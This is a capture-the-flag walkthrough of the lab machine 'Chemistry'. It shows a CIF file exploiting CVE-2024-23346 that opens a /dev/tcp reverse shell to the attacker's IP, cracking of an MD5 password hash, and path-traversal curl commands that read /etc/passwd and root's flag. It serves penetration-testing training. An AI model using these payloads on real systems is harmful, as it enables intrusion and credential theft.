Chemistry

IP Address: 10.10.11.38
OS: Linux
Difficulty: Easy

Recon

First, let's perform a nmap scan against the given IP Address to identify the open ports of the operating system.

sudo nmap -sC -sV -vv -T5 10.10.11.38 -oA nmap/chemistry.nmap

We get the following output form the nmap, scan.

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCj5eCYeJYXEGT5pQjRRX4cRr4gHoLUb/riyLfCAQMf40a6IO3BMzwyr3OnfkqZDlr6o9tS69YKDE9ZkWk01vsDM/T1k/m1ooeOaTRhx2Yene9paJnck8Stw4yVWtcq6PPYJA3HxkKeKyAnIVuYBvaPNsm+K5+rsafUEc5FtyEGlEG0YRmyk/NepEFU6qz25S3oqLLgh9Ngz4oGeLudpXOhD4gN6aHnXXUHOXJgXdtY9EgNBfd8paWTnjtloAYi4+ccdMfxO7PcDOxt5SQan1siIkFq/uONyV+nldyS3lLOVUCHD7bXuPemHVWqD2/1pJWf+PRAasCXgcUV+Je4fyNnJwec1yRCbY3qtlBbNjHDJ4p5XmnIkoUm7hWXAquebykLUwj7vaJ/V6L19J4NN8HcBsgcrRlPvRjXz0A2VagJYZV+FVhgdURiIM4ZA7DMzv9RgJCU2tNC4EyvCTAe0rAM2wj0vwYPPEiHL+xXHGSvsoZrjYt1tGHDQvy8fto5RQU=
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
|   256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 3.0.3 (Python 3.9.5)
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds
           Raw packets sent: 1006 (44.240KB) | Rcvd: 1002 (40.076KB)

The main ports open to us are:

Port 22 - SSH
Port 5000 - HTTP

Let's add a local domain name to the HTTP Server as chemistry.htb in our /etc/hosts file.

sudo nano /etc/hosts

10.10.11.38 chemistry.htb

Pasted image 20250127232611.png

Exit the edit by pressing Ctrl + x, Y, and then press ENTER.

Now, brows to the web site using the domain in your web-browser.

http://chemistry.htb:5000/

Pasted image 20250127232755.png

Here, we see the web application asking for two options, Register or Loing to the application for the analysis of something by uploading the file.

Therefor, let's register a user in the application and login.

Pasted image 20250131171629.png

Once logged in, we see a page to upload a CIF File, and the format of the file is also provided for the reference.

Pasted image 20250131174704.png

Reference Files:

example.cif

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

CVE-2024-23346 Exploit

Since we have file upload possible, there are high chances that there might be some exploit for the CIF format to get a reverse shell.

Searching in DuckDuck Go, I find the vulnerability description from the following site.

https://ethicalhacking.uk/cve-2024-23346-arbitrary-code-execution-in-pymatgen-via-insecure/#gsc.tab=0

Pasted image 20250131175304.png

You can go thought the detailed description of the Vulnerability in that blog, but our main focus is on the exploit/ POC used by them to exploit.

We will use the following part of the POC Code in our exploit.

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch
pwned");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Here, we will replace the contents inside the .system from touch pwned to /bin/bash -c \'sh -i >& /dev/tcp/<IP ADDRESS>/<PORT> 0>&1'

you can generate your reverse shell payload from RevShells and replace it with sh -i >& /dev/tcp/<IP ADDRESS>/<PORT> 0>&1

Pasted image 20250131180027.png

Making our final exploit code as below: (example1.cif)

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.128/12345 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Now, let's start a listner in our local attach machine.

nc -lvnp 12345

Pasted image 20250131180225.png

Now, upload the file to the server from the Dashboard page.

Pasted image 20250131180318.png

Now, click on View, and you will be able to see the Reverse Shell connected to your system.

Pasted image 20250131180346.png

Nice!!!!

Now, we can see that we have a user rosa who is containing the flag, but we are not able to access the files.

Pasted image 20250131180530.png

User Flag

Searing though the system, we see the folder in the user's home directory called as instance were there a Data Base present.

Pasted image 20250131180714.png

Which looks like is containing the users and their password Hashes. We all see the contents having the user rosa present in it along with a hash.

Mrosa63ed86ee9f624c7b14f1d4f43dc251a5

Password Hash: 63ed86ee9f624c7b14f1d4f43dc251a5

Pasted image 20250131180836.png

Let's identify the the hash of the password using the following command on our attach machine.

hashid 63ed86ee9f624c7b14f1d4f43dc251a5

Pasted image 20250131181034.png

Now that we know it is a MD5 hash. Let's try to find the password against John The Ripper.

John The Ripper

For the first save the hash into a file:

echo "63ed86ee9f624c7b14f1d4f43dc251a5" > password.hash

Pasted image 20250131181308.png

Now, run John the ripper against the rockyou.txt file.

john --format=Raw-MD5 --wordlist=~/Pranava__Rao/Tools/FuzzlingList/rockyou.txt password.hash

Pasted image 20250131181500.png

And Here we find the password of the user rosa

Username: rosa
Password: unicorniosrosados

SSH Login

Now, let's login into the user using ssh.

ssh [email protected]

Pasted image 20250131181827.png

And Here we find the user flag!!!

Pasted image 20250131181856.png

ROOT FLAG !>

Let's create a folder under the Temp directory of the machine.

mkdir /tmp/Hacker

Pasted image 20250131182113.png

Here, let's download LinPEAS into the target system to the folder that we created.

You can you download the LinPEASE into your local computer first by using the following command

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

Create a local server to host this file to download it to the target system.

python3 -m http.server 8008

Pasted image 20250131182943.png

Download the file.

wget http://10.10.14.128:8008/linpeas.sh

Pasted image 20250131183126.png

Now that the linpeas is present in the target system, run the tool to identify the local vulnerabilities.

bash linpeas.sh

Pasted image 20250131183310.png

Going through the output of the tool, we see an internal port to be enabled on port 8080.

Pasted image 20250131183739.png

Now to access the contents of the service running on the Port 8080, let's Port forward the local port to this address of the server.

Open a new terminal and enter the following command

ssh -L <Local IP Address>:<Local Port>:localhost:8080 [email protected]

Pasted image 20250131184017.png

Now, go to your web browser and the then enter your IP Address and the Port number that you added.
Pasted image 20250131184242.png

Here we see a static page which shows the monitoring of some logs, even after fuzzing for some files and folders, but still there was not use. And when looking at the headers of the web page using the curl, we see that the sever is running on Python/3.9 aiohttp/3.9.1

curl http://10.10.14.128:5555 --head

Pasted image 20250131192331.png

That is why, let's search for the public exploit or vulnerability for this server's hosting service.

We find that the server has a vulnerability of unauthorized reading of arbitrary files on the system. Reference from NIST

Pasted image 20250131194024.png

Now, from the earlier fuzzing for the directories, we had found the /assets folder.

Pasted image 20250131194149.png

Now, let's look for the /etc/passwd file using curl exploiting this vulnerability.

curl -s --path-as-is http://10.10.14.128:5555/assets/../../../../../etc/passwd

Pasted image 20250131194651.png

AMAZING!!!!!!!!!!! Which means that we can get the root's flag.

curl -s --path-as-is http://10.10.14.128:5555/assets/../../../../../root/root.txt

Pasted image 20250131195107.png

ROOT FLAG!!!!!!!!!!!!!!

Follow me

Instagram: @Pranava__Rao
Linked: Pranava Rao
X: @Pranava__Rao
GitHub: Pranava Rao
YouTube: @Pranava__Rao